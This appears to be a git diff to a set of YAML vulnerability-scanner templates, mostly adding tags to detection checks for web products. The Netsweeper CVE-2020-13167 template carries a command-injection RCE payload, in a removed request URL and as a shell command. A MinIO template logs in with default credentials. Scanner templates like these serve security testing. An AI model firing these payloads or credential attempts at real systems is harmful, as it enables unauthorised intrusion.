diff --git a/cves/2020/CVE-2020-12800.yaml b/cves/2020/CVE-2020-12800.yaml
index 4a4a96bb69..8216d0e966 100644
--- a/cves/2020/CVE-2020-12800.yaml
+++ b/cves/2020/CVE-2020-12800.yaml
@@ -6,6 +6,7 @@ info:
severity: critical
description: The drag-and-drop-multiple-file-upload-contact-form-7 plugin before 1.3.3.3 for WordPress allows Unrestricted File Upload and remote code execution by setting supported_type to php% and uploading a .php% file.
reference: https://github.com/amartinsec/CVE-2020-12800
+ tags: cve,cve2020,wordpress,wp-plugin
requests:
- raw:
diff --git a/cves/2020/CVE-2020-13167.yaml b/cves/2020/CVE-2020-13167.yaml
index ffe6eb67a4..961d153f44 100644
--- a/cves/2020/CVE-2020-13167.yaml
+++ b/cves/2020/CVE-2020-13167.yaml
@@ -9,13 +9,15 @@ info:
reference:
- https://ssd-disclosure.com/ssd-advisory-netsweeper-preauth-rce/
- https://portswigger.net/daily-swig/severe-rce-vulnerability-in-content-filtering-system-has-been-patched-netsweeper-says
+ additional-fields:
+ hex-payload: 'echo "bm9uZXhpc3RlbnQ=" | base64 -d > /usr/local/netsweeper/webadmin/out'
requests:
- method: GET
path:
- # Hex payload: echo "bm9uZXhpc3RlbnQ=" | base64 -d > /usr/local/netsweeper/webadmin/out
- "{{BaseURL}}/webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f2022626d39755a5868706333526c626e513d22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5"
- "{{BaseURL}}/webadmin/out"
+
headers:
Referer: "{{BaseURL}}/webadmin/admin/service_manager_data.php"
diff --git a/cves/2021/CVE-2021-3377.yaml b/cves/2021/CVE-2021-3377.yaml
index 77ded129f4..1b44686e3e 100644
--- a/cves/2021/CVE-2021-3377.yaml
+++ b/cves/2021/CVE-2021-3377.yaml
@@ -8,6 +8,7 @@ info:
- https://github.com/drudru/ansi_up/commit/c8c726ed1db979bae4f257b7fa41775155ba2e27
author: geeknik
severity: medium
+ tags: cve,cve2021,xss,npm
requests:
- raw:
diff --git a/default-logins/minio/minio-default-password.yaml b/default-logins/minio/minio-default-password.yaml
index 7d2b90fde6..12c46a6efe 100644
--- a/default-logins/minio/minio-default-password.yaml
+++ b/default-logins/minio/minio-default-password.yaml
@@ -4,23 +4,27 @@ info:
name: Minio Default Password
author: pikpikcu
severity: medium
+ tags: default-login,minio
requests:
- method: POST
path:
- "{{BaseURL}}/minio/webrpc"
+
headers:
Content-Type: application/json
- body: |
- {"id":1,"jsonrpc":"2.0","params":{"username":"minioadmin","password":"minioadmin"},"method":"Web.Login"}
+
+ body: '{"id":1,"jsonrpc":"2.0","params":{"username":"minioadmin","password":"minioadmin"},"method":"Web.Login"}'
- method: POST
path:
- "{{BaseURL}}/minio/webrpc"
+
headers:
Content-Type: application/json
- body: |
- {"id":1,"jsonrpc":"2.0","params":{"username":"minioadmin","password":"minioadmin"},"method":"web.Login"}
+
+ body: '{"id":1,"jsonrpc":"2.0","params":{"username":"minioadmin","password":"minioadmin"},"method":"web.Login"}'
+
matchers-condition: and
matchers:
diff --git a/technologies/prometheus-exposed-panel.yaml b/exposed-panels/prometheus-exposed-panel.yaml
similarity index 65%
rename from technologies/prometheus-exposed-panel.yaml
rename to exposed-panels/prometheus-exposed-panel.yaml
index b107509968..2cda5cc379 100644
--- a/technologies/prometheus-exposed-panel.yaml
+++ b/exposed-panels/prometheus-exposed-panel.yaml
@@ -1,9 +1,11 @@
id: prometheus-exposed-panel
+
info:
name: Prometheus.io exposed panel
author: organiccrap
severity: low
- # usually runs on port http/9090
+ tags: panel,prometheus
+
requests:
- method: GET
path:
@@ -12,4 +14,4 @@ requests:
matchers:
- type: word
words:
- -
Prometheus Time Series Collection and Processing Server
+ - 'Prometheus Time Series Collection and Processing Server'
\ No newline at end of file
diff --git a/exposures/configs/yii-debugger.yaml b/exposures/configs/yii-debugger.yaml
index 11232d47b1..e93bfbf58e 100644
--- a/exposures/configs/yii-debugger.yaml
+++ b/exposures/configs/yii-debugger.yaml
@@ -4,7 +4,8 @@ info:
name: View Yii Debugger Information
author: geeknik
reference: https://yii2-framework.readthedocs.io/en/stable/guide/tool-debugger/
- severity: info
+ severity: low
+ tags: yii,debug,exposure
requests:
- method: GET
@@ -16,11 +17,14 @@ requests:
- "{{BaseURL}}/sapi/debug/default/view"
redirects: true
+ max-redirects: 2
+ stop-at-first-match: true
matchers-condition: and
matchers:
- type: status
status:
- 200
+
- type: word
words:
- "Yii Debugger"
diff --git a/exposures/tokens/generic/shoppable-token.yaml b/exposures/tokens/generic/shoppable-token.yaml
index 0f68803be2..0c3d4080a0 100644
--- a/exposures/tokens/generic/shoppable-token.yaml
+++ b/exposures/tokens/generic/shoppable-token.yaml
@@ -5,6 +5,7 @@ info:
author: philippedelteil
severity: info
reference: https://ask.shoppable.com/knowledge/quick-start-api-guide
+ tags: exposure,shoppable,token
requests:
- method: GET
diff --git a/misconfiguration/front-page-misconfig.yaml b/misconfiguration/front-page-misconfig.yaml
index 7e982772b0..8d49471b46 100644
--- a/misconfiguration/front-page-misconfig.yaml
+++ b/misconfiguration/front-page-misconfig.yaml
@@ -5,6 +5,7 @@ info:
author: JTeles,pikpikcu
severity: info
reference: https://docs.microsoft.com/en-us/archive/blogs/fabdulwahab/security-protecting-sharepoint-server-applications
+ tags: misconfig,exposure,frontpage
requests:
- method: GET
diff --git a/technologies/artica-web-proxy-detect.yaml b/technologies/artica-web-proxy-detect.yaml
index 82b19cfb2d..8fd487f5ee 100644
--- a/technologies/artica-web-proxy-detect.yaml
+++ b/technologies/artica-web-proxy-detect.yaml
@@ -1,18 +1,22 @@
id: artica-web-proxy-detect
+
info:
name: Artica Web Proxy Detect
author: dwisiswant0
severity: info
+ tags: tech,artica,proxy
requests:
- method: GET
path:
- "{{BaseURL}}/fw.login.php"
+
matchers-condition: and
matchers:
- type: word
words:
- "Welcome to the Artica Web Administration Interface"
+
- type: status
status:
- 200
\ No newline at end of file
diff --git a/technologies/basic-auth-detection.yaml b/technologies/basic-auth-detection.yaml
index 66132d212e..894c3892d0 100644
--- a/technologies/basic-auth-detection.yaml
+++ b/technologies/basic-auth-detection.yaml
@@ -4,6 +4,7 @@ info:
name: Basic auth detection
author: w4cky_
severity: info
+ tags: tech,basic-auth
requests:
- method: GET
diff --git a/technologies/bigip-config-utility-detect.yaml b/technologies/bigip-config-utility-detect.yaml
index 4d3c250775..78b2741369 100644
--- a/technologies/bigip-config-utility-detect.yaml
+++ b/technologies/bigip-config-utility-detect.yaml
@@ -4,6 +4,7 @@ info:
name: BIG-IP Configuration Utility detected
author: dwisiswant0
severity: info
+ tags: tech,bigip
requests:
- method: GET
diff --git a/technologies/burp-api-detect.yaml b/technologies/burp-api-detect.yaml
index 68a7000ee7..10cc8bcac8 100644
--- a/technologies/burp-api-detect.yaml
+++ b/technologies/burp-api-detect.yaml
@@ -5,6 +5,7 @@ info:
author: joanbono
severity: info
reference: https://portswigger.net/burp/documentation/enterprise/api-reference
+ tags: burp,tech
requests:
- method: GET
diff --git a/technologies/cacti-detect.yaml b/technologies/cacti-detect.yaml
index 0a2a721928..9d1d018f12 100644
--- a/technologies/cacti-detect.yaml
+++ b/technologies/cacti-detect.yaml
@@ -4,6 +4,7 @@ info:
author: geeknik
description: Cacti is a complete network graphing solution -- https://www.cacti.net/
severity: info
+ tags: tech,cacti
requests:
- method: GET
diff --git a/technologies/clockwork-php-page.yaml b/technologies/clockwork-php-page.yaml
index 89ef10ba1b..a8537a2f36 100644
--- a/technologies/clockwork-php-page.yaml
+++ b/technologies/clockwork-php-page.yaml
@@ -1,9 +1,11 @@
id: clockwork-php-page
+
info:
name: Clockwork PHP page exposure
author: organiccrap
severity: high
reference: https://twitter.com/damian_89_/status/1250721398747791360
+ tags: tech,clockwork
requests:
- method: GET
diff --git a/technologies/cockpit-detect.yaml b/technologies/cockpit-detect.yaml
index 30bf745acc..81dd323dc8 100644
--- a/technologies/cockpit-detect.yaml
+++ b/technologies/cockpit-detect.yaml
@@ -4,6 +4,7 @@ info:
name: Detect Agentejo Cockpit
author: dwisiswant0
severity: info
+ tags: tech,cockpit
requests:
- method: GET
diff --git a/technologies/dell/dell-idrac6-detect.yaml b/technologies/dell/dell-idrac6-detect.yaml
index 9d8bb598ff..6f3c118b88 100644
--- a/technologies/dell/dell-idrac6-detect.yaml
+++ b/technologies/dell/dell-idrac6-detect.yaml
@@ -1,9 +1,11 @@
id: dell-idrac6-detect
+
info:
name: Detect Dell iDRAC6
author: kophjager007
description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers.
severity: info
+ tags: tech,dell
requests:
- method: GET
diff --git a/technologies/dell/dell-idrac7-detect.yaml b/technologies/dell/dell-idrac7-detect.yaml
index bddc00552b..220cfc4503 100644
--- a/technologies/dell/dell-idrac7-detect.yaml
+++ b/technologies/dell/dell-idrac7-detect.yaml
@@ -1,9 +1,11 @@
id: dell-idrac7-detect
+
info:
name: Detect Dell iDRAC7
author: kophjager007
description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers.
severity: info
+ tags: tech,dell
requests:
- method: GET
diff --git a/technologies/dell/dell-idrac8-detect.yaml b/technologies/dell/dell-idrac8-detect.yaml
index e25dc371e6..2fd72b97aa 100644
--- a/technologies/dell/dell-idrac8-detect.yaml
+++ b/technologies/dell/dell-idrac8-detect.yaml
@@ -1,9 +1,11 @@
id: dell-idrac8-detect
+
info:
name: Detect Dell iDRAC8
author: kophjager007
description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers.
severity: info
+ tags: tech,dell
requests:
- method: GET
diff --git a/technologies/dell/dell-idrac9-detect.yaml b/technologies/dell/dell-idrac9-detect.yaml
index 7677292de5..f339b04905 100644
--- a/technologies/dell/dell-idrac9-detect.yaml
+++ b/technologies/dell/dell-idrac9-detect.yaml
@@ -1,9 +1,11 @@
id: dell-idrac9-detect
+
info:
name: Detect Dell iDRAC9
author: kophjager007
description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers.
severity: info
+ tags: tech,dell
requests:
- method: GET
diff --git a/technologies/favicon-detection.yaml b/technologies/favicon-detection.yaml
index 7394c9fff3..3cf1e620d8 100644
--- a/technologies/favicon-detection.yaml
+++ b/technologies/favicon-detection.yaml
@@ -10,6 +10,7 @@ info:
- https://medium.com/@Asm0d3us/weaponizing-favicon-ico-for-bugbounties-osint-and-what-not-ace3c214e139
- https://github.com/devanshbatham/FavFreak
- https://github.com/sansatart/scrapts/blob/master/shodan-favicon-hashes.csv
+ tags: tech,favicon
requests:
- method: GET
diff --git a/technologies/firebase-detect.yaml b/technologies/firebase-detect.yaml
index fe3ff98b30..5c22ef8819 100644
--- a/technologies/firebase-detect.yaml
+++ b/technologies/firebase-detect.yaml
@@ -5,11 +5,13 @@ info:
author: organiccrap
severity: low
reference: http://ghostlulz.com/google-exposed-firebase-database/
+ tags: tech,firebase
requests:
- method: GET
path:
- "{{BaseURL}}/.settings/rules.json?auth=FIREBASE_SECRET"
+
matchers:
- type: word
words:
diff --git a/technologies/google-storage.yaml b/technologies/google-storage.yaml
index 27f4814a5b..95963c6a8c 100644
--- a/technologies/google-storage.yaml
+++ b/technologies/google-storage.yaml
@@ -4,6 +4,7 @@ info:
name: Google Bucket detection
author: 0xTeles
severity: info
+ tags: tech,gstorage,google,bucket
requests:
- method: GET
diff --git a/technologies/graphql-detect.yaml b/technologies/graphql-detect.yaml
index ef649b7d06..53d67b1326 100644
--- a/technologies/graphql-detect.yaml
+++ b/technologies/graphql-detect.yaml
@@ -4,6 +4,7 @@ info:
name: GraphQL API Detection
author: NkxxkN,ELSFA7110
severity: info
+ tags: tech,graphql
requests:
- method: POST
diff --git a/technologies/graylog-api-browser.yaml b/technologies/graylog-api-browser.yaml
index 6c93a114fa..98799a87c0 100644
--- a/technologies/graylog-api-browser.yaml
+++ b/technologies/graylog-api-browser.yaml
@@ -4,6 +4,7 @@ info:
name: Detect Graylog REST API
author: PR3R00T
severity: info
+ tags: tech,graylog
requests:
- method: GET
diff --git a/technologies/gunicorn-detect.yaml b/technologies/gunicorn-detect.yaml
index 69f286e77b..56f5080384 100644
--- a/technologies/gunicorn-detect.yaml
+++ b/technologies/gunicorn-detect.yaml
@@ -1,9 +1,11 @@
id: gunicorn-detect
+
info:
name: Detect Gunicorn Server
author: joanbono
description: Gunicorn Python WSGI HTTP Server for UNIX - https://github.com/benoitc/gunicorn
severity: info
+ tags: tech,gunicorn
requests:
- method: GET
@@ -22,4 +24,4 @@ requests:
- type: kval
part: header
kval:
- - Server
+ - Server
\ No newline at end of file
diff --git a/technologies/harbor-detect.yaml b/technologies/harbor-detect.yaml
index e082b48acf..1ede65a8df 100644
--- a/technologies/harbor-detect.yaml
+++ b/technologies/harbor-detect.yaml
@@ -1,8 +1,10 @@
id: harbor-detect
+
info:
name: Harbor Detect
author: pikpikcu
severity: info
+ tags: tech,harbor
requests:
- method: GET
diff --git a/technologies/home-assistant.yaml b/technologies/home-assistant.yaml
index 0522fc067b..dfb82e44b7 100644
--- a/technologies/home-assistant.yaml
+++ b/technologies/home-assistant.yaml
@@ -4,6 +4,7 @@ info:
name: Detect Home Assistant
author: fabaff
severity: info
+ tags: tech,iot
requests:
- method: GET
diff --git a/technologies/ilo-detect.yaml b/technologies/ilo-detect.yaml
index 70f0fc1e8d..6eeff924eb 100644
--- a/technologies/ilo-detect.yaml
+++ b/technologies/ilo-detect.yaml
@@ -5,6 +5,7 @@ info:
author: milo2012
severity: info
description: Version of HP iLO
+ tags: tech,ilo
requests:
- method: GET
diff --git a/technologies/jaspersoft-detect.yaml b/technologies/jaspersoft-detect.yaml
index 7cafc9a84d..e26ad12b3f 100644
--- a/technologies/jaspersoft-detect.yaml
+++ b/technologies/jaspersoft-detect.yaml
@@ -4,6 +4,7 @@ info:
name: Jaspersoft detected
author: koti2
severity: info
+ tags: tech,jaspersoft
requests:
- method: GET
diff --git a/technologies/jellyfin-detect.yaml b/technologies/jellyfin-detect.yaml
index ae031c20ca..9b31eaed43 100644
--- a/technologies/jellyfin-detect.yaml
+++ b/technologies/jellyfin-detect.yaml
@@ -4,6 +4,7 @@ info:
name: Jellyfin detected
author: dwisiswant0
severity: info
+ tags: tech,jellyfin
requests:
- method: GET
@@ -13,6 +14,8 @@ requests:
- "{{BaseURL}}/index.html"
- "{{BaseURL}}/web/index.html"
- "{{BaseURL}}/web/manifest.json"
+
+ stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
@@ -22,6 +25,7 @@ requests:
- "The Free Software Media System"
condition: or
part: body
+
- type: status
status:
- 200
diff --git a/technologies/jolokia.yaml b/technologies/jolokia.yaml
index f6b28ff6ad..957b898273 100644
--- a/technologies/jolokia.yaml
+++ b/technologies/jolokia.yaml
@@ -4,11 +4,13 @@ info:
name: Jolokia Version Disclosure
author: mavericknerd,dwisiswant0
severity: info
+ tags: tech,jolokia
requests:
- method: GET
path:
- '{{BaseURL}}/jolokia/version'
+
matchers-condition: and
matchers:
- type: word
@@ -17,6 +19,7 @@ requests:
- '"protocol":'
- '"agent":'
condition: and
+
- type: status
status:
- 200
diff --git a/technologies/kibana-detect.yaml b/technologies/kibana-detect.yaml
index c35b4dd301..c64939b6df 100644
--- a/technologies/kibana-detect.yaml
+++ b/technologies/kibana-detect.yaml
@@ -4,6 +4,7 @@ info:
name: Kibana Service Detection
author: petruknisme
severity: info
+ tags: tech,kibana
requests:
- method: GET
diff --git a/technologies/kong-detect.yaml b/technologies/kong-detect.yaml
index 6164d7c1cd..39e4d58bb7 100644
--- a/technologies/kong-detect.yaml
+++ b/technologies/kong-detect.yaml
@@ -4,6 +4,7 @@ info:
author: geeknik
description: The Cloud-Native API Gateway - https://github.com/Kong/kong
severity: info
+ tags: tech,kong
requests:
- method: GET
diff --git a/technologies/liferay-portal-detect.yaml b/technologies/liferay-portal-detect.yaml
index ebf42ab88b..2a8de63c94 100644
--- a/technologies/liferay-portal-detect.yaml
+++ b/technologies/liferay-portal-detect.yaml
@@ -1,9 +1,11 @@
id: liferay-portal-detect
+
info:
name: Liferay Portal Detection
author: organiccrap,dwisiswant0
severity: info
reference: https://github.com/mzer0one/CVE-2020-7961-POC # CVE-2020-7961: Liferay Portal Unauthenticated RCE
+ tags: tech,liferay
requests:
- method: GET
diff --git a/technologies/linkerd-badrule-detect.yaml b/technologies/linkerd-badrule-detect.yaml
index 5e445af239..0e1ef8ff57 100644
--- a/technologies/linkerd-badrule-detect.yaml
+++ b/technologies/linkerd-badrule-detect.yaml
@@ -1,15 +1,11 @@
id: linkerd-badrule-detect
-# Detect the Linkerd service by overriding the delegation table with an invalid
-# rule, the presence of the service is indicated by either:
-# - a "Via: .. linkerd .."
-# - a "l5d-err" and/or a "l5d-success" header
-# - a literal error in the body
-
info:
name: Linkerd detection via bad rule
author: dudez
severity: info
+ tags: tech,linkerd
+ reference: https://linkerd.io
requests:
- method: GET
diff --git a/technologies/lotus-domino-version.yaml b/technologies/lotus-domino-version.yaml
index 3af4529ee9..897d6fad2e 100644
--- a/technologies/lotus-domino-version.yaml
+++ b/technologies/lotus-domino-version.yaml
@@ -1,8 +1,10 @@
id: lotus-domino-version
+
info:
name: Lotus Domino Version Extractor
author: CasperGN
severity: info
+ tags: tech,lotus
requests:
- method: GET
path:
diff --git a/technologies/metabase-detect.yaml b/technologies/metabase-detect.yaml
index 2b8c4cec7d..3a865ab0e7 100644
--- a/technologies/metabase-detect.yaml
+++ b/technologies/metabase-detect.yaml
@@ -1,13 +1,17 @@
id: metabase-version-detect
+
info:
name: Detect Metabase Version
author: revblock
description: If a Metabase instance is deployed on the target URL it will return a login page with the version number in the page source
severity: info
+ tags: tech,metabase
+
requests:
- method: GET
path:
- "{{BaseURL}}/auth/login"
+
matchers-condition: and
matchers:
diff --git a/technologies/mrtg-detect.yaml b/technologies/mrtg-detect.yaml
index 19a062f6fa..96f95f15d6 100644
--- a/technologies/mrtg-detect.yaml
+++ b/technologies/mrtg-detect.yaml
@@ -1,9 +1,11 @@
id: mrtg-detect
+
info:
name: Detect MRTG
author: geeknik
description: The Multi Router Traffic Grapher -- https://oss.oetiker.ch/mrtg/
severity: info
+ tags: tech,mrtg
requests:
- method: GET
diff --git a/technologies/netsweeper-webadmin-detect.yaml b/technologies/netsweeper-webadmin-detect.yaml
index cc107c6ddc..04b545b315 100644
--- a/technologies/netsweeper-webadmin-detect.yaml
+++ b/technologies/netsweeper-webadmin-detect.yaml
@@ -4,6 +4,7 @@ info:
name: Netsweeper WebAdmin detected
author: dwisiswant0
severity: info
+ tags: tech,netsweeper
requests:
- method: GET
diff --git a/technologies/nginx-version.yaml b/technologies/nginx-version.yaml
index 9674f616ed..302d5d3d19 100644
--- a/technologies/nginx-version.yaml
+++ b/technologies/nginx-version.yaml
@@ -1,9 +1,12 @@
id: nginx-version
+
info:
name: nginx version detect
author: philippedelteil
description: Some nginx servers have the version on the response header. Useful when you need to find specific CVEs on your targets.
severity: info
+ tags: tech,nginx
+
requests:
- method: GET
path:
diff --git a/technologies/nifi-detech.yaml b/technologies/nifi-detech.yaml
index 8e593cc440..837e4c43fd 100644
--- a/technologies/nifi-detech.yaml
+++ b/technologies/nifi-detech.yaml
@@ -4,6 +4,7 @@ info:
name: Apache NiFi detect
author: dwisiswant0
severity: info
+ tags: tech,apache,nifi
requests:
- method: GET
@@ -15,6 +16,7 @@ requests:
- "{{BaseURL}}/flow/registries"
- "{{BaseURL}}/system-diagnostics"
- "{{BaseURL}}/nifi-api/access/config"
+
matchers-condition: and
matchers:
- type: regex
@@ -22,6 +24,7 @@ requests:
- "supportsLogin"
- "disconnectedNodeAcknowledged"
- "(aggregate|node)Snapshots?"
+
- type: status
status:
- 200
diff --git a/technologies/oidc-detect.yaml b/technologies/oidc-detect.yaml
index d8f65083d7..f87bf320d2 100644
--- a/technologies/oidc-detect.yaml
+++ b/technologies/oidc-detect.yaml
@@ -1,9 +1,11 @@
id: oidc-detect
+
info:
name: Detect OpenID Connect provider
author: jarijaas
severity: info
description: Detects OpenID Connect providers. See https://en.wikipedia.org/wiki/OpenID_Connect
+ tags: tech,oidc
requests:
- method: GET
diff --git a/technologies/openam-detection.yaml b/technologies/openam-detection.yaml
index b3c603dde0..fd1653f20f 100644
--- a/technologies/openam-detection.yaml
+++ b/technologies/openam-detection.yaml
@@ -4,6 +4,7 @@ info:
name: Detect OpenAM and OpenSSO
author: philippedelteil
severity: info
+ tags: tech,openam
requests:
- method: GET
diff --git a/technologies/pi-hole-detect.yaml b/technologies/pi-hole-detect.yaml
index 0f5cbcb052..22d1a56dca 100644
--- a/technologies/pi-hole-detect.yaml
+++ b/technologies/pi-hole-detect.yaml
@@ -1,8 +1,10 @@
id: pi-hole-detect
+
info:
name: pi-hole detector
author: geeknik
severity: info
+ tags: tech,pihole
requests:
- method: GET
@@ -14,6 +16,7 @@ requests:
- type: status
status:
- 200
+
- type: word
words:
- "Pi-hole"
diff --git a/technologies/prtg-detect.yaml b/technologies/prtg-detect.yaml
index c57d90484d..c630eff289 100644
--- a/technologies/prtg-detect.yaml
+++ b/technologies/prtg-detect.yaml
@@ -1,9 +1,11 @@
id: prtg-detect
+
info:
name: Detect PRTG
author: geeknik
description: Monitor all the systems, devices, traffic, and applications in your IT infrastructure -- https://www.paessler.com/prtg
severity: info
+ tags: tech,prtg
requests:
- method: GET
diff --git a/technologies/redmine-cli-detect.yaml b/technologies/redmine-cli-detect.yaml
index 24a02349aa..8cb08b7888 100644
--- a/technologies/redmine-cli-detect.yaml
+++ b/technologies/redmine-cli-detect.yaml
@@ -4,6 +4,7 @@ info:
author: geeknik
description: A small command-line utility to interact with Redmine - https://pypi.org/project/Redmine-CLI/
severity: info
+ tags: tech,redmine
requests:
- method: GET
diff --git a/technologies/s3-detect.yaml b/technologies/s3-detect.yaml
index fe617373af..3ed37bb68e 100644
--- a/technologies/s3-detect.yaml
+++ b/technologies/s3-detect.yaml
@@ -4,6 +4,7 @@ info:
name: Detect Amazon-S3 Bucket
author: melbadry9
severity: info
+ tags: aws,s3,bucket,tech
requests:
- method: GET
diff --git a/technologies/shiro-detect.yaml b/technologies/shiro-detect.yaml
index 321f556a03..8353c48494 100644
--- a/technologies/shiro-detect.yaml
+++ b/technologies/shiro-detect.yaml
@@ -1,16 +1,20 @@
id: shiro-detect
+
info:
name: Detect Shiro Framework
author: AresX
severity: info
+ tags: tech,shiro
+
requests:
- method: GET
path:
- '{{BaseURL}}'
headers:
Cookie: rememberMe=123;
+
matchers:
- type: word
words:
- - rememberMe=deleteMe
+ - 'rememberMe=deleteMe'
part: header
\ No newline at end of file
diff --git a/technologies/springboot-actuator.yaml b/technologies/springboot-actuator.yaml
index 6bc4c9e7a1..ebc7edbe1e 100644
--- a/technologies/springboot-actuator.yaml
+++ b/technologies/springboot-actuator.yaml
@@ -4,13 +4,17 @@ info:
name: Detect Springboot Actuators
author: that_juan_,dwisiswant0,wdahlenb
severity: info
+ tags: tech,springboot,actuator
requests:
- method: GET
path:
+ - "{{BaseURL}}"
- "{{BaseURL}}/actuator"
- "{{BaseURL}}/favicon.ico"
+ - "{{BaseURL}}/actuator/favicon.ico"
+ stop-at-first-match: true
matchers-condition: or
matchers:
- type: word
diff --git a/technologies/sql-server-reporting.yaml b/technologies/sql-server-reporting.yaml
index 5b08ec1032..4b64c61e6f 100644
--- a/technologies/sql-server-reporting.yaml
+++ b/technologies/sql-server-reporting.yaml
@@ -4,6 +4,7 @@ info:
name: Detect Microsoft SQL Server Reporting
author: puzzlepeaches
severity: info
+ tags: tech,micrsoft
requests:
- method: GET
diff --git a/technologies/telerik-fileupload-detect.yaml b/technologies/telerik-fileupload-detect.yaml
index 810cef7a8b..8f150d8b40 100644
--- a/technologies/telerik-fileupload-detect.yaml
+++ b/technologies/telerik-fileupload-detect.yaml
@@ -4,11 +4,13 @@ info:
name: Detect Telerik Web UI fileupload handler
author: organiccrap
severity: info
+ tags: tech,telerik
requests:
- method: GET
path:
- "{{BaseURL}}/Telerik.Web.UI.WebResource.axd?type=rau"
+
matchers:
- type: word
words:
diff --git a/technologies/terraform-detect.yaml b/technologies/terraform-detect.yaml
index 8c4d3307df..4a458c77e2 100644
--- a/technologies/terraform-detect.yaml
+++ b/technologies/terraform-detect.yaml
@@ -1,9 +1,11 @@
id: terraform-detect
+
info:
name: Detect Terraform Provider
author: geeknik
description: Write Infrastructure as Code - https://www.terraform.io/
severity: info
+ tags: tech,terraform
requests:
- method: GET
diff --git a/technologies/tomcat-detect.yaml b/technologies/tomcat-detect.yaml
index d5a164932d..5561dba63d 100644
--- a/technologies/tomcat-detect.yaml
+++ b/technologies/tomcat-detect.yaml
@@ -1,10 +1,12 @@
-id: tomcat-version-detect
+id: tomcat-version
+
info:
name: Detect Tomcat Version
author: philippedelteil
- description: If an Tomcat instance is deployed on the target URL, when we send a request for
- a non existent resource we receive a Tomcat error page with version.
+ description: If an Tomcat instance is deployed on the target URL, when we send a request for a non existent resource we receive a Tomcat error page with version.
severity: info
+ tags: tech,tomcat,apache
+
requests:
- method: GET
path:
diff --git a/technologies/tor-socks-proxy.yaml b/technologies/tor-socks-proxy.yaml
index ddbe880309..4957f092b8 100644
--- a/technologies/tor-socks-proxy.yaml
+++ b/technologies/tor-socks-proxy.yaml
@@ -1,8 +1,10 @@
id: tor-socks-proxy
+
info:
name: Detect tor SOCKS proxy
author: geeknik
severity: info
+ tags: tech,tor,proxy
requests:
- method: GET
diff --git a/technologies/weblogic-detect.yaml b/technologies/weblogic-detect.yaml
index 6d290ac6f8..4effb62c55 100644
--- a/technologies/weblogic-detect.yaml
+++ b/technologies/weblogic-detect.yaml
@@ -4,6 +4,7 @@ info:
name: Detect Weblogic
author: bing0o
severity: info
+ tags: tech,weblogic
requests:
- method: GET
diff --git a/technologies/werkzeug-debugger-detect.yaml b/technologies/werkzeug-debugger-detect.yaml
index f11eac5435..aa90f4c1a3 100644
--- a/technologies/werkzeug-debugger-detect.yaml
+++ b/technologies/werkzeug-debugger-detect.yaml
@@ -4,6 +4,7 @@ info:
name: Werkzeug debugger console
author: pdteam
severity: info
+ tags: tech,werkzeug
requests:
- method: GET
diff --git a/vulnerabilities/lsoft/listserv_maestro_rce.yaml b/vulnerabilities/lsoft/listserv_maestro_rce.yaml
index 3f04c30a27..56b6d5f00f 100644
--- a/vulnerabilities/lsoft/listserv_maestro_rce.yaml
+++ b/vulnerabilities/lsoft/listserv_maestro_rce.yaml
@@ -8,6 +8,7 @@ info:
reference:
- https://www.securifera.com/advisories/sec-2020-0001/
- https://packetstormsecurity.com/files/159643/listservmaestro-exec.txt
+ tags: rce,listserv,ognl
requests:
- method: GET
diff --git a/vulnerabilities/other/cacti-weathermap-file-write.yaml b/vulnerabilities/other/cacti-weathermap-file-write.yaml
index b8ebf42adb..04a5d1b654 100644
--- a/vulnerabilities/other/cacti-weathermap-file-write.yaml
+++ b/vulnerabilities/other/cacti-weathermap-file-write.yaml
@@ -5,6 +5,7 @@ info:
author: pikpikcu
severity: medium
reference: https://www.freebuf.com/articles/system/125177.html
+ tags: injection,cacti
requests:
- method: GET
diff --git a/vulnerabilities/other/caucho-resin-info-disclosure.yaml b/vulnerabilities/other/caucho-resin-info-disclosure.yaml
index f4fa330ad9..04795427db 100644
--- a/vulnerabilities/other/caucho-resin-info-disclosure.yaml
+++ b/vulnerabilities/other/caucho-resin-info-disclosure.yaml
@@ -5,6 +5,7 @@ info:
author: pikpikcu
severity: info
reference: https://www.exploit-db.com/exploits/27888
+ tags: exposure,resin
requests:
- method: GET
diff --git a/vulnerabilities/other/pmb-local-file-disclosure.yaml b/vulnerabilities/other/pmb-local-file-disclosure.yaml
index 062d1759ab..a62783f871 100644
--- a/vulnerabilities/other/pmb-local-file-disclosure.yaml
+++ b/vulnerabilities/other/pmb-local-file-disclosure.yaml
@@ -5,6 +5,7 @@ info:
author: dhiyaneshDk
severity: high
reference: https://www.exploit-db.com/exploits/49054
+ tags: lfi,pmb
requests:
- method: GET
diff --git a/vulnerabilities/other/vpms-auth-bypass.yaml b/vulnerabilities/other/vpms-auth-bypass.yaml
index d0dcd358f6..6f612b4f78 100644
--- a/vulnerabilities/other/vpms-auth-bypass.yaml
+++ b/vulnerabilities/other/vpms-auth-bypass.yaml
@@ -5,7 +5,7 @@ info:
author: dwisiswant0
severity: high
reference: https://www.exploit-db.com/exploits/48877
-
+ tags: auth-bypass
requests:
- raw:
- |
diff --git a/vulnerabilities/other/zms-auth-bypass.yaml b/vulnerabilities/other/zms-auth-bypass.yaml
index fbc1e03821..65c7df9984 100644
--- a/vulnerabilities/other/zms-auth-bypass.yaml
+++ b/vulnerabilities/other/zms-auth-bypass.yaml
@@ -5,6 +5,7 @@ info:
author: dwisiswant0
severity: high
reference: https://www.exploit-db.com/exploits/48880
+ tags: auth-bypass,zms
requests:
- raw: